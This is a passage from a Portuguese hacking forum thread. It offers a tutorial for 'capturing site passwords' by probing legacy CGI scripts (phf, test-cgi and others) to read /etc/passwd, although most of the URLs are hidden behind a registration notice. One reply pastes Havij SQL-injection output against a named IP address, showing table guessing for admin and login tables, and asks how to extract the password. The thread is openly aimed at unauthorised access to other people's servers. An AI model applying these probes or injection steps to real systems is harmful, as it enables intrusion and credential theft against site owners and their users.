Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Capturando senhas de sites

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Tutorial Capturando senhas de sites


    Uma técnica um pouco antiga mas funciona ainda
    Desta forma você conseguira entrar sem sites restritos que necessitam de senhas para entrar

    Lembrando que não funciona em todos os sites



    phf Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    php.cgi Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... test-cgi
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    query Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... faxsurvey Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... htmlscript Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... webdist.cgi Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... nph-test-cgi Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    echo Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    view-source Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    pfdisplay Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    campas Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    wrap Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    whatever Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... /etc/passwd|? data=Download xenolith Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... /etc/passwd/| ?data=Download

    Obs: Substitua o xxx.xxx.xxx pelo endereço ou IP do site.
    sigpic



    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Vou ver se Funfa aki, vlw
    • Top

    Comment

    • Font Size
      #3
      Não consegui nenhum senha!!
      • Top

      Comment

      • Font Size
        #4
        antigo pakas...mais vlwss
        • Top

        Comment

        • Font Size
          #5
          São poucos os servidores que ainda aceitam isso..

          Mais valeu a dica ai..

          Abraços.
          sigpic
          • Top

          Comment

          • Font Size
            #6
            É raro encontrar servidores com essa falha... mais com certeza ainda deve ter.
            • Top

            Comment

            • Font Size
              #7
              Essa é das antigas kkkk tiro do fundo do bau

              • Top

              Comment

              • Font Size
                #8
                Havih



                Havij 1.14 Pro!
                License is valid
                Analyzing Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                Host IP: 200.98.197.34
                Web Server: Apache
                Keyword Found: baixo
                Injection type is Integer
                Keyword corrected: saberem
                DB Server: MySQL >=5
                Trying another method using keyword for finding columns count
                Selected Column Count is 2
                Finding string column
                Retying to find string column
                Cannot find string column!
                Injection type is blind!
                Finding current data base
                Length of 'Current DB' is 7
                Current DB: b???N?x
                Can not get Length of 'Data Base'
                Can not get Length of 'Data Base'
                Length of 'Data Base' is 60
                Data Base: q?wry???q?{?j}???4?X?~?p?y?G???????????~?p?????~ pvx??|?~
                Can not get Length of 'Data Base'
                Length of 'Data Base' is 51
                Data Base: ?x?r??M~?y???wf??~p?G????o??????w???sYxIz?d ~
                Length of 'Data Base' is 47
                Data Base: ????)N??yf???qdwl~?~??r~N??{?????z?W?`c??e?l
                Can not get Length of 'Data Base'
                Can not get Length of 'Table Name'
                It seems information_schema table does not exist! Trying to guess tables!
                Table found: admins
                Table found: manager
                Table found: tbl_member
                Table found: memberlist
                Table found: tblmanagers
                Table found: adminstbl
                Table found: tusers
                Table found: uid
                Table found: auid
                Table found: FirstName
                Table found: user_logins
                Table found: webadmin
                Table found: tbaccount
                Table found: tbllogin
                Table found: tb_useraccount
                Table found: tbl_login
                Table found: tbl_nguoidungs
                Table found: administrator
                Table found: usr_n
                Table found: admin_pass
                Table found: dbuser
                Table found: person
                Table found: personal
                Table found: dbpersoon
                Table found: lists
                Table found: userpwd
                Table found: administrate
                Table found: adminpsw
                Table found: Kunst
                Table found: Autor
                Table found: client
                Table found: art
                Table found: tblnews
                Table found: article_admin
                Table found: company
                Table found: usuario
                Table found: uploads
                Table found: content
                Table found: control
                Table found: cpg_config
                Table found: cpg132_users
                Table found: controle
                Table found: customer
                Table found: dealer
                Table found: Event
                Table found: db
                Table found: group
                Table found: ibf_admin_sessions
                Table found: ibf_sessions
                Table found: icq
                Table found: Bilder
                Table found: jos_comprofiler_members
                Table found: jos_messages_cfg
                Table found: korisnici
                Table found: Mitglieder
                Table found: mysql.user
                Table found: Namen
                Table found: nuke_authors
                Table found: nuke_users
                Guessing table(404/687): perdoruesit
                Canceling...
                Total tables found: 59
                Job Canceled!
                Length of 'Column Name' is 53
                Column Name: s
                Canceling...
                Column Name:
                Job Canceled


                Duvida ?

                Como faço para encontrar a senha sem ter q olhar pasta por pasta ?

                Tem senha ae mesmo ou eh soh uma pegadinha do administrador ?

                moslen@hotmail.com
                • Top

                Comment

                • Font Size
                  #9
                  Essa falha não vale mais apena explorar 80 % dos servidores já pegou esse bug sendo que essa pesquisa é de 2009 e noís estamos em 2011
                  • Top

                  Comment

                  • Font Size
                    #10
                    nao teve nem uma pasta encontrada ai, ele so tentou encontrar alguma tabela ai por brute force
                    • Top

                    Comment

                    • Font Size
                      #11
                      muito bom amigo. mesmo sendo antigo, acreditem, um sistema utilizado no site do banco itau ano passado fez com que muitos tivessem acessos a dados privados de empregados do banco.

                      • Top

                      Comment

                      Anterior template Avançar
                      X
                      Working...
                      X